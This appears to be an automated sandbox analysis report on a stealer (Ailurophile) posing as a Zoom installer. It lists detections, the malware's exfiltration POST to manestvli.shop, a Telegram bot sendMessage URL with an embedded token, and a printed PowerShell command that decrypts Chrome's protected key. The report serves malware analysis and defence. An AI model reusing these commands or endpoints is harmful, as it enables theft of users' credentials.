Windows Analysis Report
ZoomInstaller.exe

Overview

General Information

Sample name: ZoomInstaller.exe
Analysis ID: 1544493
MD5: 806a6ccce380785faa45512ce603c580
SHA1: 78a2936e19f0474f80f73144564e9f24c4559859
SHA256: c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
Tags: exeuser-NDA0E

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected generic credential text file
Installs new ROOT certificates
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 90.7% probability
Source: ZoomInstaller.exe Joe Sandbox ML: detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAB52AE CryptUnprotectData, 15_2_00007FFD9BAB52AE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9BAD52AE CryptUnprotectData, 17_2_00007FFD9BAD52AE
Source: ZoomInstaller.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic Suricata IDS: 2057103 - Severity 1 - ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) : 192.168.2.4:65406 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057104 - Severity 1 - ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI : 192.168.2.4:49737 -> 188.114.97.3:443
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 104.26.9.59
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1
    Host: api.myip.com
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
Source: global traffic DNS traffic detected: DNS query: api.myip.com
Source: global traffic DNS traffic detected: DNS query: manestvli.shop
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /upload.php?data=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&hash=2d6441c1bfc749b0344f HTTP/1.1
    Host: manestvli.shop
    User-Agent: Go-http-client/1.1
    Content-Length: 6347
    Content-Type: multipart/form-data; boundary=c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794a
    Accept-Encoding: gzip
Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000364000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.dr String found in binary or memory: https://ailurophilestealer.com
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ailurophilestealer.com/bot
Source: powershell.exe, 0000000F.00000002.1815118814.0000025638A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405E311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000102000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot%s/sendMessage
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1815118814.0000025639633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405EF42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://manestvli.shop/upload.php?
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://manestvli.shop/upload.php?C:
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
Source: powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000049000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016========
Source: ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000212000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0000BE000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000208000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000552000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1982764110.000000C00054E000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000080000.00000004.00001000.00020000.00000000.sdmp, history.db.0.dr, Google-Default.txt.0.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ZoomInstaller.exe, 00000000.00000002.1982764110.000000C000500000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942189720.000002976C803000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1942109309.000002976C803000.00000004.00000020.00020000.00000000.sdmp, history.db.0.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: DestroyEnvironmentBlockreflect.Value.Interfacereflect.Value.NumMethodRemoveFontMemResourceExGetLogicalDriveStringsWSHGetSpecialFolderPathWRegisterRawInputDevicestoo many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: GetSidSubAuthorityCountQueryServiceLockStatusWRegNotifyChangeKeyValueSetKernelObjectSecurityDeleteVolumeMountPointWGetActiveProcessorCountSetInformationJobObjectSetNamedPipeHandleStateSetProcessPriorityBoostNtSetInformationProcessGetFileVersionInfoSizeWinvalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingasn1: structure error: truncated tag or length942d6eb00e0cbfd901026890zip: writer closed twicejson: unsupported type: runtime: C malloc failedargument must be a FLOATPRAGMA auto_vacuum = %d;PRAGMA synchronous = %s;application/octet-streamunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sRequest Entity Too Largehttp: nil Request.Headerexec: Stdout already settracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailable memstr_baf83cf5-4
Source: ZoomInstaller.exe Static PE information: Number of sections : 24 > 10
Source: ZoomInstaller.exe, 00000000.00000000.1697687201.00007FF68496E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
Source: ZoomInstaller.exe Binary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
Source: classification engine Classification label: mal76.troj.spyw.evad.winEXE@28/27@3/3
Source: C:\Users\user\Desktop\ZoomInstaller.exe File created: C:\Users\user\AppData\Local\Ailurophile
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1
Source: ZoomInstaller.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\ZoomInstaller.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00015D000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944543316.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944783848.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.1944945030.000002976C7FB000.00000004.00000020.00020000.00000000.sdmp, passwords.db.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ZoomInstaller.exe, 00000000.00000000.1697330522.00007FF6845EC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: ZoomInstaller.exe String found in binary or memory: failed to construct HKDF label: %sCM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key size2006-01-02T15:04:05.999999999Z07:00unpaired removeDep: no %T dep on %Tencoding/hex: odd length hex string2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00Non-function passed to RegisterFunc'_' must separate successive digitsform-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0executable file not found in %PATH%persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=network dropped connection on resettransport endpoint is not connectedhash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9" is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %qtoo many Questions to pack (>65535)file type does not support deadlineunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid 
Huffman-encoded datadynamic table size update too largeSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizeP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferecb85da208ccedcda3abcbadadfb5fb91423cc98009cc670a9423fd9472b78d5727fbdb18cad2624ace4f40c34ea4b25ed4f06096b5e8cbf70c74380253b0ce5babaf95cd02b767d868ff87e042ab8ab4a2ab596c8cb97fa4249cd843fe7bc726f1bef30912dbabb142ff299crypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0name %q does not begin with a lettersql: converting argument %s type: %wconverting NULL to %s is unsupportedjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after
Source: ZoomInstaller.exe String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: ZoomInstaller.exe String found in binary or memory: -stopTimer
Source: ZoomInstaller.exe String found in binary or memory: -addr
Source: ZoomInstaller.exe String found in binary or memory: -stop
Source: unknown Process created: C:\Users\user\Desktop\ZoomInstaller.exe "C:\Users\user\Desktop\ZoomInstaller.exe"
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_videocontroller get caption
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\tasklist.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Version
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\tasklist.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = 